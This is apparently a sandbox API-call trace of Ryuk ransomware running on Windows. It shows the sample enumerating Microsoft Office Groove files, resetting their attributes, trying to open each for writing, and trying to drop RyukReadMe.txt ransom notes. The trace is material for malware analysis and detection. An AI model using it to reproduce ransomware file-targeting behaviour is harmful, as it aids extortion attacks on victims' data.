[0137.266] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_hyperlink.gif", dwFileAttributes=0x80) returned 0 [0137.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_hyperlink.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_hyperlink.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.266] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.266] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.266] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_increaseindent.gif", dwFileAttributes=0x80) returned 0 [0137.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_increaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_increaseindent.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.266] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.267] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.267] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_italic.gif", dwFileAttributes=0x80) returned 0 [0137.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_italic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_italic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.267] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.267] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.267] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_justify.gif", dwFileAttributes=0x80) returned 0 [0137.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_justify.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_justify.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.268] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.268] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.268] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.268] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_pressed.gif", dwFileAttributes=0x80) returned 0 [0137.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_pressed.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_pressed.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.268] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.268] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.268] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.268] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_spellcheck.gif", dwFileAttributes=0x80) returned 0 [0137.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_spellcheck.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_spellcheck.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.269] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.269] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.269] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_underline.gif", dwFileAttributes=0x80) returned 0 [0137.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_underline.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_underline.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.269] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.270] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.270] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\SAVE.GIF", dwFileAttributes=0x80) returned 0 [0137.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\SAVE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\save.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.270] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.270] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.270] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.270] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\SUBMIT.JS", dwFileAttributes=0x80) returned 0 [0137.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\SUBMIT.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\submit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.270] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.271] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.271] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\utilityfunctions.js", dwFileAttributes=0x80) returned 0 [0137.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\utilityfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.271] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.271] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.271] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\validation.js", dwFileAttributes=0x80) returned 0 [0137.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\validation.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.272] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.272] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.272] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.272] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO", dwFileAttributes=0x80) returned 0 [0137.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.273] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.273] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.273] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.JS", dwFileAttributes=0x80) returned 0 [0137.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\VIEW.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.273] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.273] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.273] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg", dwFileAttributes=0x80) returned 0 [0137.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\viewheaderpreview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.274] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.274] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.274] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0137.274] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.274] SetLastError (dwErrCode=0x0) [0137.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.274] GetLastError () returned 0x5 [0137.274] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.274] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.274] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.274] SetLastError (dwErrCode=0x0) [0137.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.274] GetLastError () returned 0x5 [0137.275] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.275] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.275] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2d00 [0137.276] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.277] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\ADD.GIF", dwFileAttributes=0x80) returned 0 [0137.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\ADD.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\add.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.277] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.277] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.278] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.278] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\attention.gif", dwFileAttributes=0x80) returned 0 [0137.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\attention.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.278] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.278] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.278] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\CALENDAR.GIF", dwFileAttributes=0x80) returned 0 [0137.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\CALENDAR.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\calendar.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.279] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.279] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.279] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\DELETE.GIF", dwFileAttributes=0x80) returned 0 [0137.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\DELETE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\delete.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.279] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.279] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.279] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.279] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\ERROR.GIF", dwFileAttributes=0x80) returned 0 [0137.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\ERROR.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\error.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.280] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.280] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.280] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.280] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FORM.JS", dwFileAttributes=0x80) returned 0 [0137.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FORM.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\form.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.280] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.280] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.280] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.280] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html", dwFileAttributes=0x80) returned 0 [0137.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsblankpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.281] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.281] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.281] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 0 [0137.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsbrowserupgrade.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.281] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.281] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.282] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html", dwFileAttributes=0x80) returned 0 [0137.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formscolorchart.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.282] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.282] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.282] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.282] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html", dwFileAttributes=0x80) returned 0 [0137.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsformtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.282] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.282] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.283] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html", dwFileAttributes=0x80) returned 0 [0137.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsformtemplatertl.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.283] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.283] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.283] 